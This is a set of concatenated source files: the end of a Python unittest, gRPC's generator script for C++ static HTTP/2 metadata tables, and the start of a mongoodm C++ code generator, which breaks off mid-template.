self.assertEqual(get_func_args(cal), ['a', 'b', 'c'])
self.assertEqual(get_func_args(object), [])
if platform.python_implementation() == 'CPython':
# TODO: how do we fix this to return the actual argument names?
self.assertEqual(get_func_args(str.split), [])
self.assertEqual(get_func_args(" ".join), [])
self.assertEqual(get_func_args(operator.itemgetter(2)), [])
else:
self.assertEqual(
get_func_args(str.split, stripself=True), ['sep', 'maxsplit'])
self.assertEqual(get_func_args(" ".join, stripself=True), ['list'])
self.assertEqual(
get_func_args(operator.itemgetter(2), stripself=True), ['obj'])
def test_without_none_values(self):
self.assertEqual(without_none_values([1, None, 3, 4]), [1, 3, 4])
self.assertEqual(without_none_values((1, None, 3, 4)), (1, 3, 4))
self.assertEqual(
without_none_values({'one': 1, 'none': None, 'three': 3, 'four': 4}),
{'one': 1, 'three': 3, 'four': 4})
if __name__ == "__main__":
unittest.main()
|
|
#!/usr/bin/env python2.7
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import itertools
import collections
import os
import sys
import subprocess
import re
import perfection
# Configuration: a list of either strings or 2-tuples of strings.
# A single string represents a static grpc_mdstr.
# A 2-tuple represents a static grpc_mdelem (and appropriate grpc_mdstrs will
# also be created).
# The list of 2-tuples must begin with the static hpack table elements as
# defined by RFC 7541 and be in the same order because of an hpack encoding
# performance optimization that relies on this. If you want to change this, then
# you must change the implementation of the encoding optimization as well.
CONFIG = [
# metadata strings
'host',
'grpc-timeout',
'grpc-internal-encoding-request',
'grpc-internal-stream-encoding-request',
'grpc-payload-bin',
':path',
'grpc-encoding',
'grpc-accept-encoding',
'user-agent',
':authority',
'grpc-message',
'grpc-status',
'grpc-server-stats-bin',
'grpc-tags-bin',
'grpc-trace-bin',
'grpc-previous-rpc-attempts',
'grpc-retry-pushback-ms',
'1',
'2',
'3',
'4',
'',
'x-endpoint-load-metrics-bin',
# channel arg keys
'grpc.wait_for_ready',
'grpc.timeout',
'grpc.max_request_message_bytes',
'grpc.max_response_message_bytes',
# well known method names
'/grpc.lb.v1.LoadBalancer/BalanceLoad',
'/envoy.service.load_stats.v2.LoadReportingService/StreamLoadStats',
'/envoy.service.load_stats.v3.LoadReportingService/StreamLoadStats',
'/grpc.health.v1.Health/Watch',
'/envoy.service.discovery.v2.AggregatedDiscoveryService/StreamAggregatedResources',
'/envoy.service.discovery.v3.AggregatedDiscoveryService/StreamAggregatedResources',
# compression algorithm names
'deflate',
'gzip',
'stream/gzip',
# metadata elements
# begin hpack static elements
(':authority', ''),
(':method', 'GET'),
(':method', 'POST'),
(':path', '/'),
(':path', '/index.html'),
(':scheme', 'http'),
(':scheme', 'https'),
(':status', '200'),
(':status', '204'),
(':status', '206'),
(':status', '304'),
(':status', '400'),
(':status', '404'),
(':status', '500'),
('accept-charset', ''),
('accept-encoding', 'gzip, deflate'),
('accept-language', ''),
('accept-ranges', ''),
('accept', ''),
('access-control-allow-origin', ''),
('age', ''),
('allow', ''),
('authorization', ''),
('cache-control', ''),
('content-disposition', ''),
('content-encoding', ''),
('content-language', ''),
('content-length', ''),
('content-location', ''),
('content-range', ''),
('content-type', ''),
('cookie', ''),
('date', ''),
('etag', ''),
('expect', ''),
('expires', ''),
('from', ''),
('host', ''),
('if-match', ''),
('if-modified-since', ''),
('if-none-match', ''),
('if-range', ''),
('if-unmodified-since', ''),
('last-modified', ''),
('link', ''),
('location', ''),
('max-forwards', ''),
('proxy-authenticate', ''),
('proxy-authorization', ''),
('range', ''),
('referer', ''),
('refresh', ''),
('retry-after', ''),
('server', ''),
('set-cookie', ''),
('strict-transport-security', ''),
('transfer-encoding', ''),
('user-agent', ''),
('vary', ''),
('via', ''),
('www-authenticate', ''),
# end hpack static elements
('grpc-status', '0'),
('grpc-status', '1'),
('grpc-status', '2'),
('grpc-encoding', 'identity'),
('grpc-encoding', 'gzip'),
('grpc-encoding', 'deflate'),
('te', 'trailers'),
('content-type', 'application/grpc'),
(':scheme', 'grpc'),
(':method', 'PUT'),
('accept-encoding', ''),
('content-encoding', 'identity'),
('content-encoding', 'gzip'),
('lb-cost-bin', ''),
]
# All entries here are ignored when counting non-default initial metadata that
# prevents the chttp2 server from sending a Trailers-Only response.
METADATA_BATCH_CALLOUTS = [
':path',
':method',
':status',
':authority',
':scheme',
'te',
'grpc-message',
'grpc-status',
'grpc-payload-bin',
'grpc-encoding',
'grpc-accept-encoding',
'grpc-server-stats-bin',
'grpc-tags-bin',
'grpc-trace-bin',
'content-type',
'content-encoding',
'accept-encoding',
'grpc-internal-encoding-request',
'grpc-internal-stream-encoding-request',
'user-agent',
'host',
'grpc-previous-rpc-attempts',
'grpc-retry-pushback-ms',
'x-endpoint-load-metrics-bin',
]
COMPRESSION_ALGORITHMS = [
'identity',
'deflate',
'gzip',
]
STREAM_COMPRESSION_ALGORITHMS = [
'identity',
'gzip',
]
# utility: mangle the name of a config
def mangle(elem, name=None):
xl = {
'-': '_',
':': '',
'/': 'slash',
'.': 'dot',
',': 'comma',
' ': '_',
}
def m0(x):
if not x:
return 'empty'
r = ''
for c in x:
put = xl.get(c, c.lower())
if not put:
continue
last_is_underscore = r[-1] == '_' if r else True
if last_is_underscore and put == '_':
continue
elif len(put) > 1:
if not last_is_underscore:
r += '_'
r += put
r += '_'
else:
r += put
if r[-1] == '_':
r = r[:-1]
return r
def n(default, name=name):
if name is None:
return 'grpc_%s_' % default
if name == '':
return ''
return 'grpc_%s_' % name
if isinstance(elem, tuple):
return '%s%s_%s' % (n('mdelem'), m0(elem[0]), m0(elem[1]))
else:
return '%s%s' % (n('mdstr'), m0(elem))
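# Illustrative outputs of mangle(), derived from the translation rules above
# (shown for reference only; not part of the generator's logic):
#   mangle('grpc-timeout')     -> 'grpc_mdstr_grpc_timeout'
#   mangle(':path')            -> 'grpc_mdstr_path'    (':' is dropped)
#   mangle((':status', '200')) -> 'grpc_mdelem_status_200'
#   mangle('')                 -> 'grpc_mdstr_empty'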
# utility: generate some hash value for a string
def fake_hash(elem):
return hashlib.md5(elem).hexdigest()[0:8]
# utility: print a big comment block into a set of files
def put_banner(files, banner):
for f in files:
print >> f, '/*'
for line in banner:
print >> f, ' * %s' % line
print >> f, ' */'
print >> f
# build a list of all the strings we need
all_strs = list()
all_elems = list()
static_userdata = {}
# Put metadata batch callouts first, to make checking whether a static
# metadata string is a callout trivial.
for elem in METADATA_BATCH_CALLOUTS:
if elem not in all_strs:
all_strs.append(elem)
for elem in CONFIG:
if isinstance(elem, tuple):
if elem[0] not in all_strs:
all_strs.append(elem[0])
if elem[1] not in all_strs:
all_strs.append(elem[1])
if elem not in all_elems:
all_elems.append(elem)
else:
if elem not in all_strs:
all_strs.append(elem)
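# For every non-empty subset of COMPRESSION_ALGORITHMS (encoded as a bitmask
# with bit 0 = 'identity'), synthesize a matching 'grpc-accept-encoding'
# element; e.g. mask 0b101 yields ('grpc-accept-encoding', 'identity,gzip').
# The stored userdata appears to be the mask with the identity bit forced on,
# offset by 1 so that 0 can be reserved for "no userdata".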
compression_elems = []
for mask in range(1, 1 << len(COMPRESSION_ALGORITHMS)):
val = ','.join(COMPRESSION_ALGORITHMS[alg]
for alg in range(0, len(COMPRESSION_ALGORITHMS))
if (1 << alg) & mask)
elem = ('grpc-accept-encoding', val)
if val not in all_strs:
all_strs.append(val)
if elem not in all_elems:
all_elems.append(elem)
compression_elems.append(elem)
static_userdata[elem] = 1 + (mask | 1)
stream_compression_elems = []
for mask in range(1, 1 << len(STREAM_COMPRESSION_ALGORITHMS)):
val = ','.join(STREAM_COMPRESSION_ALGORITHMS[alg]
for alg in range(0, len(STREAM_COMPRESSION_ALGORITHMS))
if (1 << alg) & mask)
elem = ('accept-encoding', val)
if val not in all_strs:
all_strs.append(val)
if elem not in all_elems:
all_elems.append(elem)
stream_compression_elems.append(elem)
static_userdata[elem] = 1 + (mask | 1)
# output configuration
args = sys.argv[1:]
H = None
C = None
D = None
if args:
if 'header' in args:
H = sys.stdout
else:
H = open('/dev/null', 'w')
if 'source' in args:
C = sys.stdout
else:
C = open('/dev/null', 'w')
if 'dictionary' in args:
D = sys.stdout
else:
D = open('/dev/null', 'w')
else:
H = open(
os.path.join(os.path.dirname(sys.argv[0]),
'../../../src/core/lib/transport/static_metadata.h'), 'w')
C = open(
os.path.join(os.path.dirname(sys.argv[0]),
'../../../src/core/lib/transport/static_metadata.cc'), 'w')
D = open(
os.path.join(os.path.dirname(sys.argv[0]),
'../../../test/core/end2end/fuzzers/hpack.dictionary'),
'w')
# copy-paste copyright notice from this file
with open(sys.argv[0]) as my_source:
copyright = []
for line in my_source:
if line[0] != '#':
break
for line in my_source:
if line[0] == '#':
copyright.append(line)
break
for line in my_source:
if line[0] != '#':
break
copyright.append(line)
put_banner([H, C], [line[2:].rstrip() for line in copyright])
hex_bytes = [ord(c) for c in 'abcdefABCDEF0123456789']
def esc_dict(line):
out = "\""
for c in line:
if 32 <= c < 127:
if c != ord('"'):
out += chr(c)
else:
out += "\\\""
else:
out += '\\x%02X' % c
return out + "\""
put_banner([H, C], """WARNING: Auto-generated code.
To make changes to this file, change
tools/codegen/core/gen_static_metadata.py, and then re-run it.
See metadata.h for an explanation of the interface here, and metadata.cc for
an explanation of what's going on.
""".splitlines())
print >> H, '#ifndef GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H'
print >> H, '#define GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H'
print >> H
print >> H, '#include <grpc/support/port_platform.h>'
print >> H
print >> H, '#include <cstdint>'
print >> H
print >> H, '#include "src/core/lib/transport/metadata.h"'
print >> H
print >> C, '#include <grpc/support/port_platform.h>'
print >> C
print >> C, '#include "src/core/lib/transport/static_metadata.h"'
print >> C
print >> C, '#include "src/core/lib/slice/slice_internal.h"'
print >> C
str_ofs = 0
id2strofs = {}
for i, elem in enumerate(all_strs):
id2strofs[i] = str_ofs
str_ofs += len(elem)
def slice_def_for_ctx(i):
return (
'grpc_core::StaticMetadataSlice(&refcounts[%d].base, %d, g_bytes+%d)'
) % (i, len(all_strs[i]), id2strofs[i])
def slice_def(i):
return (
'grpc_core::StaticMetadataSlice(&grpc_static_metadata_refcounts()[%d].base, %d, g_bytes+%d)'
) % (i, len(all_strs[i]), id2strofs[i])
def str_idx(s):
for i, s2 in enumerate(all_strs):
if s == s2:
return i
# validate configuration
for elem in METADATA_BATCH_CALLOUTS:
assert elem in all_strs
static_slice_dest_assert = (
'static_assert(std::is_trivially_destructible' +
'<grpc_core::StaticMetadataSlice>::value, '
'"grpc_core::StaticMetadataSlice must be trivially destructible.");')
print >> H, static_slice_dest_assert
print >> H, '#define GRPC_STATIC_MDSTR_COUNT %d' % len(all_strs)
print >> H, '''
void grpc_init_static_metadata_ctx(void);
void grpc_destroy_static_metadata_ctx(void);
namespace grpc_core {
#ifndef NDEBUG
constexpr uint64_t kGrpcStaticMetadataInitCanary = 0xCAFEF00DC0FFEE11L;
uint64_t StaticMetadataInitCanary();
#endif
extern const StaticMetadataSlice* g_static_metadata_slice_table;
}
inline const grpc_core::StaticMetadataSlice* grpc_static_slice_table() {
GPR_DEBUG_ASSERT(grpc_core::StaticMetadataInitCanary()
== grpc_core::kGrpcStaticMetadataInitCanary);
GPR_DEBUG_ASSERT(grpc_core::g_static_metadata_slice_table != nullptr);
return grpc_core::g_static_metadata_slice_table;
}
'''
for i, elem in enumerate(all_strs):
print >> H, '/* "%s" */' % elem
print >> H, '#define %s (grpc_static_slice_table()[%d])' % (
mangle(elem).upper(), i)
print >> H
print >> C, 'static constexpr uint8_t g_bytes[] = {%s};' % (','.join(
'%d' % ord(c) for c in ''.join(all_strs)))
print >> C
print >> H, '''
namespace grpc_core {
struct StaticSliceRefcount;
extern StaticSliceRefcount* g_static_metadata_slice_refcounts;
}
inline grpc_core::StaticSliceRefcount* grpc_static_metadata_refcounts() {
GPR_DEBUG_ASSERT(grpc_core::StaticMetadataInitCanary()
== grpc_core::kGrpcStaticMetadataInitCanary);
GPR_DEBUG_ASSERT(grpc_core::g_static_metadata_slice_refcounts != nullptr);
return grpc_core::g_static_metadata_slice_refcounts;
}
'''
print >> C, 'grpc_slice_refcount grpc_core::StaticSliceRefcount::kStaticSubRefcount;'
print >> C, '''
namespace grpc_core {
struct StaticMetadataCtx {
#ifndef NDEBUG
const uint64_t init_canary = kGrpcStaticMetadataInitCanary;
#endif
StaticSliceRefcount
refcounts[GRPC_STATIC_MDSTR_COUNT] = {
'''
for i, elem in enumerate(all_strs):
print >> C, ' StaticSliceRefcount(%d), ' % i
print >> C, '};' # static slice refcounts
print >> C
print >> C, '''
const StaticMetadataSlice
slices[GRPC_STATIC_MDSTR_COUNT] = {
'''
for i, elem in enumerate(all_strs):
print >> C, slice_def_for_ctx(i) + ','
print >> C, '};' # static slices
print >> C, 'StaticMetadata static_mdelem_table[GRPC_STATIC_MDELEM_COUNT] = {'
for idx, (a, b) in enumerate(all_elems):
print >> C, 'StaticMetadata(%s,%s, %d),' % (slice_def_for_ctx(
str_idx(a)), slice_def_for_ctx(str_idx(b)), idx)
print >> C, '};' # static_mdelem_table
print >> C, ('''
/* Warning: the core static metadata currently operates under the soft constraint
that the first GRPC_CHTTP2_LAST_STATIC_ENTRY (61) entries must contain
metadata specified by the http2 hpack standard. The CHTTP2 transport reads the
core metadata with this assumption in mind. If the order of the core static
metadata is to be changed, then the CHTTP2 transport must be changed as well to
stop relying on the core metadata. */
''')
print >> C, ('grpc_mdelem '
'static_mdelem_manifested[GRPC_STATIC_MDELEM_COUNT] = {')
print >> C, '// clang-format off'
static_mds = []
for i, elem in enumerate(all_elems):
md_name = mangle(elem).upper()
md_human_readable = '"%s": "%s"' % elem
md_spec = ' /* %s: \n %s */\n' % (md_name, md_human_readable)
md_spec += ' GRPC_MAKE_MDELEM(\n'
md_spec += ((' &static_mdelem_table[%d].data(),\n' % i) +
' GRPC_MDELEM_STORAGE_STATIC)')
static_mds.append(md_spec)
print >> C, ',\n'.join(static_mds)
print >> C, '// clang-format on'
print >> C, ('};') # static_mdelem_manifested
print >> C, '};' # struct StaticMetadataCtx
print >> C, '}' # namespace grpc_core
print >> C, '''
namespace grpc_core {
static StaticMetadataCtx* g_static_metadata_slice_ctx = nullptr;
const StaticMetadataSlice* g_static_metadata_slice_table = nullptr;
StaticSliceRefcount* g_static_metadata_slice_refcounts = nullptr;
StaticMetadata* g_static_mdelem_table = nullptr;
grpc_mdelem* g_static_mdelem_manifested = nullptr;
#ifndef NDEBUG
uint64_t StaticMetadataInitCanary() {
return g_static_metadata_slice_ctx->init_canary;
}
#endif
}
void grpc_init_static_metadata_ctx(void) {
grpc_core::g_static_metadata_slice_ctx
= new grpc_core::StaticMetadataCtx();
grpc_core::g_static_metadata_slice_table
= grpc_core::g_static_metadata_slice_ctx->slices;
grpc_core::g_static_metadata_slice_refcounts
= grpc_core::g_static_metadata_slice_ctx->refcounts;
grpc_core::g_static_mdelem_table
= grpc_core::g_static_metadata_slice_ctx->static_mdelem_table;
grpc_core::g_static_mdelem_manifested =
grpc_core::g_static_metadata_slice_ctx->static_mdelem_manifested;
}
void grpc_destroy_static_metadata_ctx(void) {
delete grpc_core::g_static_metadata_slice_ctx;
grpc_core::g_static_metadata_slice_ctx = nullptr;
grpc_core::g_static_metadata_slice_table = nullptr;
grpc_core::g_static_metadata_slice_refcounts = nullptr;
grpc_core::g_static_mdelem_table = nullptr;
grpc_core::g_static_mdelem_manifested = nullptr;
}
'''
print >> C
print >> H, '#define GRPC_IS_STATIC_METADATA_STRING(slice) \\'
print >> H, (' ((slice).refcount != NULL && (slice).refcount->GetType() == '
'grpc_slice_refcount::Type::STATIC)')
print >> H
print >> C
print >> H, '#define GRPC_STATIC_METADATA_INDEX(static_slice) \\'
print >> H, '(reinterpret_cast<grpc_core::StaticSliceRefcount*>((static_slice).refcount)->index)'
print >> H
print >> D, '# hpack fuzzing dictionary'
for i, elem in enumerate(all_strs):
print >> D, '%s' % (esc_dict([len(elem)] + [ord(c) for c in elem]))
for i, elem in enumerate(all_elems):
print >> D, '%s' % (esc_dict([0, len(elem[0])] + [ord(c) for c in elem[0]] +
[len(elem[1])] + [ord(c) for c in elem[1]]))
print >> H, '#define GRPC_STATIC_MDELEM_COUNT %d' % len(all_elems)
print >> H, '''
namespace grpc_core {
extern StaticMetadata* g_static_mdelem_table;
extern grpc_mdelem* g_static_mdelem_manifested;
}
inline grpc_core::StaticMetadata* grpc_static_mdelem_table() {
GPR_DEBUG_ASSERT(grpc_core::StaticMetadataInitCanary()
== grpc_core::kGrpcStaticMetadataInitCanary);
GPR_DEBUG_ASSERT(grpc_core::g_static_mdelem_table != nullptr);
return grpc_core::g_static_mdelem_table;
}
inline grpc_mdelem* grpc_static_mdelem_manifested() {
GPR_DEBUG_ASSERT(grpc_core::StaticMetadataInitCanary()
== grpc_core::kGrpcStaticMetadataInitCanary);
GPR_DEBUG_ASSERT(grpc_core::g_static_mdelem_manifested != nullptr);
return grpc_core::g_static_mdelem_manifested;
}
'''
print >> H, ('extern uintptr_t '
'grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT];')
for i, elem in enumerate(all_elems):
md_name = mangle(elem).upper()
print >> H, '/* "%s": "%s" */' % elem
print >> H, ('#define %s (grpc_static_mdelem_manifested()[%d])' %
(md_name, i))
print >> H
print >> C, ('uintptr_t grpc_static_mdelem_user_data[GRPC_STATIC_MDELEM_COUNT] '
'= {')
print >> C, ' %s' % ','.join(
'%d' % static_userdata.get(elem, 0) for elem in all_elems)
print >> C, '};'
print >> C
def md_idx(m):
for i, m2 in enumerate(all_elems):
if m == m2:
return i
def offset_trials(mink):
yield 0
for i in range(1, 100):
for mul in [-1, 1]:
yield mul * i
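# Build a collision-free (perfect) hash for the given integer keys via the
# 'perfection' library: key i maps to x + r[y], where x = (i + offset) % t
# and y = (i + offset) / t. The returned dict carries both a Python evaluator
# ('pyfunc') and the equivalent C code emitted into the generated source.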
def perfect_hash(keys, name):
p = perfection.hash_parameters(keys)
def f(i, p=p):
i += p.offset
x = i % p.t
y = i / p.t
return x + p.r[y]
return {
'PHASHNKEYS':
len(p.slots),
'pyfunc':
f,
'code':
"""
static const int8_t %(name)s_r[] = {%(r)s};
static uint32_t %(name)s_phash(uint32_t i) {
i %(offset_sign)s= %(offset)d;
uint32_t x = i %% %(t)d;
uint32_t y = i / %(t)d;
uint32_t h = x;
if (y < GPR_ARRAY_SIZE(%(name)s_r)) {
uint32_t delta = (uint32_t)%(name)s_r[y];
h += delta;
}
return h;
}
""" % {
'name': name,
'r': ','.join('%d' % (r if r is not None else 0) for r in p.r),
't': p.t,
'offset': abs(p.offset),
'offset_sign': '+' if p.offset > 0 else '-'
}
}
elem_keys = [
str_idx(elem[0]) * len(all_strs) + str_idx(elem[1]) for elem in all_elems
]
elem_hash = perfect_hash(elem_keys, 'elems')
print >> C, elem_hash['code']
keys = [0] * int(elem_hash['PHASHNKEYS'])
idxs = [255] * int(elem_hash['PHASHNKEYS'])
for i, k in enumerate(elem_keys):
h = elem_hash['pyfunc'](k)
assert keys[h] == 0
keys[h] = k
idxs[h] = i
print >> C, 'static const uint16_t elem_keys[] = {%s};' % ','.join(
'%d' % k for k in keys)
print >> C, 'static const uint8_t elem_idxs[] = {%s};' % ','.join(
'%d' % i for i in idxs)
print >> C
print >> H, 'grpc_mdelem grpc_static_mdelem_for_static_strings(intptr_t a, intptr_t b);'
print >> C, 'grpc_mdelem grpc_static_mdelem_for_static_strings(intptr_t a, intptr_t b) {'
print >> C, ' if (a == -1 || b == -1) return GRPC_MDNULL;'
print >> C, ' uint32_t k = static_cast<uint32_t>(a * %d + b);' % len(all_strs)
print >> C, ' uint32_t h = elems_phash(k);'
print >> C, ' return h < GPR_ARRAY_SIZE(elem_keys) && elem_keys[h] == k && elem_idxs[h] != 255 ? GRPC_MAKE_MDELEM(&grpc_static_mdelem_table()[elem_idxs[h]].data(), GRPC_MDELEM_STORAGE_STATIC) : GRPC_MDNULL;'
print >> C, '}'
print >> C
print >> H, 'typedef enum {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' %s,' % mangle(elem, 'batch').upper()
print >> H, ' GRPC_BATCH_CALLOUTS_COUNT'
print >> H, '} grpc_metadata_batch_callouts_index;'
print >> H
print >> H, 'typedef union {'
print >> H, ' struct grpc_linked_mdelem *array[GRPC_BATCH_CALLOUTS_COUNT];'
print >> H, ' struct {'
for elem in METADATA_BATCH_CALLOUTS:
print >> H, ' struct grpc_linked_mdelem *%s;' % mangle(elem, '').lower()
print >> H, ' } named;'
print >> H, '} grpc_metadata_batch_callouts;'
print >> H
batch_idx_of_hdr = '#define GRPC_BATCH_INDEX_OF(slice) \\'
static_slice = 'GRPC_IS_STATIC_METADATA_STRING((slice))'
slice_to_slice_ref = '(slice).refcount'
static_slice_ref_type = 'grpc_core::StaticSliceRefcount*'
slice_ref_as_static = ('reinterpret_cast<' + static_slice_ref_type + '>(' +
slice_to_slice_ref + ')')
slice_ref_idx = slice_ref_as_static + '->index'
batch_idx_type = 'grpc_metadata_batch_callouts_index'
slice_ref_idx_to_batch_idx = ('static_cast<' + batch_idx_type + '>(' +
slice_ref_idx + ')')
batch_invalid_idx = 'GRPC_BATCH_CALLOUTS_COUNT'
batch_invalid_u32 = 'static_cast<uint32_t>(' + batch_invalid_idx + ')'
# Assemble GRPC_BATCH_INDEX_OF(slice) macro as a join for ease of reading.
batch_idx_of_pieces = [
batch_idx_of_hdr, '\n', '(', static_slice, '&&', slice_ref_idx, '<=',
batch_invalid_u32, '?', slice_ref_idx_to_batch_idx, ':', batch_invalid_idx,
')'
]
print >> H, ''.join(batch_idx_of_pieces)
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_encoding_metadata[%d];' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_encoding_metadata[%d] = {' % (
1 << len(COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join('%d' % md_idx(elem) for elem in compression_elems)
print >> C, '};'
print >> C
print >> H, '#define GRPC_MDELEM_ACCEPT_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table()[grpc_static_accept_encoding_metadata[(algs)]].data(), GRPC_MDELEM_STORAGE_STATIC))'
print >> H
print >> H, 'extern const uint8_t grpc_static_accept_stream_encoding_metadata[%d];' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, 'const uint8_t grpc_static_accept_stream_encoding_metadata[%d] = {' % (
1 << len(STREAM_COMPRESSION_ALGORITHMS))
print >> C, '0,%s' % ','.join(
'%d' % md_idx(elem) for elem in stream_compression_elems)
print >> C, '};'
print >> H, '#define GRPC_MDELEM_ACCEPT_STREAM_ENCODING_FOR_ALGORITHMS(algs) (GRPC_MAKE_MDELEM(&grpc_static_mdelem_table()[grpc_static_accept_stream_encoding_metadata[(algs)]].data(), GRPC_MDELEM_STORAGE_STATIC))'
print >> H, '#endif /* GRPC_CORE_LIB_TRANSPORT_STATIC_METADATA_H */'
H.close()
C.close()
D.close()
|
|
#!/usr/bin/env python
"""Code generator of mongoodm"""
import sys
import os
import argparse
import string
import xml.etree.cElementTree
import inflection
import pprint
#Error codes
E_SUCCESS = 0
E_NOT_EXIST = 1
E_INVALID_ARGUMENT = 2
E_INSUFFICIENT_ARGUMENTS = 3
E_PARSE = 4
E_UNDEFINED = 5
E_INVALID_DIR = 6
E_INVALID_ENTITY = 7
E_INVALID_TYPE = 8
E_GENERATE_CODE = 9
# constants
__version__ = '0.1.0'
description = 'Code generator of mongoodm. Developed by Junheng Zang(junheng.zang@gmail.com).'
default_config_filename = 'db.xml'
gen_base_dir = "generated"
basic_data_type_dict = {
'int32': {
'field': 'mongoodm::Int32Field',
'value': 'mongoodm::Int32Value',
'raw_value_type': 'int32_t',
'setter_params': 'int32_t value',
'setter_args': 'value'
},
'uint32': {
'field': 'mongoodm::UInt32Field',
'value': 'mongoodm::UInt32Value',
'raw_value_type': 'uint32_t',
'setter_params': 'uint32_t value',
'setter_args': 'value'
},
'int64': {
'field': 'mongoodm::Int64Field',
'value': 'mongoodm::Int64Value',
'raw_value_type': 'int64_t',
'setter_params': 'int64_t value',
'setter_args': 'value'
},
'uint64': {
'field': 'mongoodm::UInt64Field',
'value': 'mongoodm::UInt64Value',
'raw_value_type': 'uint64_t',
'setter_params': 'uint64_t value',
'setter_args': 'value'
},
'bool': {
'field': 'mongoodm::BoolField',
'value': 'mongoodm::BoolValue',
'raw_value_type': 'bool',
'setter_params': 'bool value',
'setter_args': 'value'
},
'double': {
'field': 'mongoodm::DoubleField',
'value': 'mongoodm::DoubleValue',
'raw_value_type': 'double',
'setter_params': 'double value',
'setter_args': 'value'
},
'datetime': {
'field': 'mongoodm::DateTimeField',
'value': 'mongoodm::DateTimeValue',
'raw_value_type': 'time_t',
'setter_params': 'time_t value',
'setter_args': 'value'
},
'string': {
'field': 'mongoodm::StringField',
'value': 'mongoodm::StringValue',
'raw_value_type': 'std::string',
'setter_params': 'const std::string &value',
'setter_args': 'value'
},
'binary': {
'field': 'mongoodm::BinaryField',
'value': 'mongoodm::BinaryValue',
'raw_value_type': "std::string",
'setter_params': 'bson_subtype_t subtype, const std::string &data',
'setter_args': 'subtype, data'
},
'objectid': {
'field': 'mongoodm::ObjectIdField',
'value': 'mongoodm::ObjectIdValue',
'raw_value_type': 'std::string',
'setter_params': 'const std::string &value',
'setter_args': 'value'
}
}
document_h_field_number_def_template = '''\
${field_number_tag} = ${field_number},\
'''
document_h_basic_field_accessor_template = '''\
// ${field_name}
inline bool has_${field_name}() const { return has_bit(${field_number_tag}); }
void clear_${field_name}();
const ${field_value_class_name}* ${field_name}() const;
${field_value_class_name}& mutable_${field_name}();
'''
document_h_basic_field_raw_getter_template = '''\
inline ${field_value_raw_type} ${field_name}_value() const { return ${field_name}_->GetValue().GetValue(); }
'''
document_h_datetime_field_raw_getter_template = '''\
inline time_t ${field_name}_value() const { return ${field_name}_->GetValue().GetTime(); }
'''
document_h_basic_field_setter_template = '''\
inline void set_${field_name}(${field_setter_params}) { mutable_${field_name}().SetValue(${field_setter_args}); }
'''
document_h_datetime_field_setter_template = '''\
inline void set_${field_name}(time_t t) { mutable_${field_name}().SetTime(t); }
inline void set_${field_name}(struct timeval &tv) { mutable_${field_name}().SetTimeValue(tv); }
'''
document_cpp_basic_field_method_template = '''\
void ${class_name}::clear_${field_name}()
{
if (has_${field_name}()) {
clear_has_${field_name}();
DelField("${field_name}");
${field_name}_ = NULL;
}
}
const ${field_value_class_name}* ${class_name}::${field_name}() const
{
if (!has_${field_name}()) {
return NULL;
}
return &(${field_name}_->GetValue());
}
${field_value_class_name}& ${class_name}::mutable_${field_name}()
{
if (!has_${field_name}()) {
set_has_${field_name}();
        ${field_name}_ = new ${field_class_name}("${field_name}");
AddField(${field_name}_, false);
}
return ${field_name}_->GetValue();
}
'''
document_h_array_field_accessor_template = '''\
// ${field_name}
inline bool has_${field_name}() const { return has_bit(${field_number_tag}); }
void clear_${field_name}();
int ${field_name}_size() const;
const ${array_member_class_name}* ${field_name}(size_t index) const;
${array_member_class_name}* mutable_${field_name}(size_t index);
${array_member_class_name}& add_${field_name}_member();
bool del_${field_name}_member(size_t index);
${field_value_class_name}* ${field_name}();
${field_value_class_name}& mutable_${field_name}();
'''
document_cpp_array_field_method_template = '''\
int ${class_name}::${field_name}_size() const
{
return has_${field_name}() ? ${field_name}_->GetValue().GetSize() : 0;
}
void ${class_name}::clear_${field_name}()
{
if (has_${field_name}()) {
clear_has_${field_name}();
DelField("${field_name}");
${field_name}_ = NULL;
}
}
const ${array_member_class_name}* ${class_name}::${field_name}(size_t index) const
{
if (!has_${field_name}()) {
return NULL;
}
return dynamic_cast<const ${array_member_class_name}*>(${field_name}_->GetValue().GetMember(index));
}
${array_member_class_name}* ${class_name}::mutable_${field_name}(size_t index)
{
if (!has_${field_name}()) {
return NULL;
}
return dynamic_cast<${array_member_class_name}*>(${field_name}_->GetValue().GetMember(index));
}
${array_member_class_name}& ${class_name}::add_${field_name}_member()
{
if (!has_${field_name}()) {
set_has_${field_name}();
${field_name}_ = new ${field_class_name}("${field_name}");
AddField(${field_name}_, false);
}
${array_member_class_name} *value = new ${array_member_class_name}();
${field_name}_->GetValue().AddMember(value, false);
return *value;
}
bool ${class_name}::del_${field_name}_member(size_t index)
{
if (!has_${field_name}()) {
return false;
}
return ${field_name}_->GetValue().DelMember(index);
}
${field_value_class_name}* ${class_name}::${field_name}()
{
if (!has_${field_name}()) {
return NULL;
}
return &(${field_name}_->GetValue());
}
${field_value_class_name}& ${class_name}::mutable_${field_name}()
{
if (!has_${field_name}()) {
set_has_${field_name}();
${field_name}_ = new ${field_class_name}("${field_name}");
AddField(${field_name}_, false);
}
return ${field_name}_->GetValue();
}
'''
document_h_field_bit_method_template = '''\
inline void set_has_${field_name}() { set_has_bit(${field_number_tag}); }
inline void clear_has_${field_name}() { clear_has_bit(${field_number_tag}); }\
'''
document_h_field_var_def_template = '''\
${field_class_name} *${field_name}_;\
'''
document_h_template = '''\
#ifndef ${header_guard}
#define ${header_guard}
#include <mongoodm/mongoodm.h>
${include_file_list}
${namespace_begin}
class ${class_name} : public mongoodm::Document
{
private:
enum {
${field_number_defs}
};
public:
${class_name}();
virtual ~${class_name}();
${class_name}(const ${class_name} &other) { CopyFrom(other); }
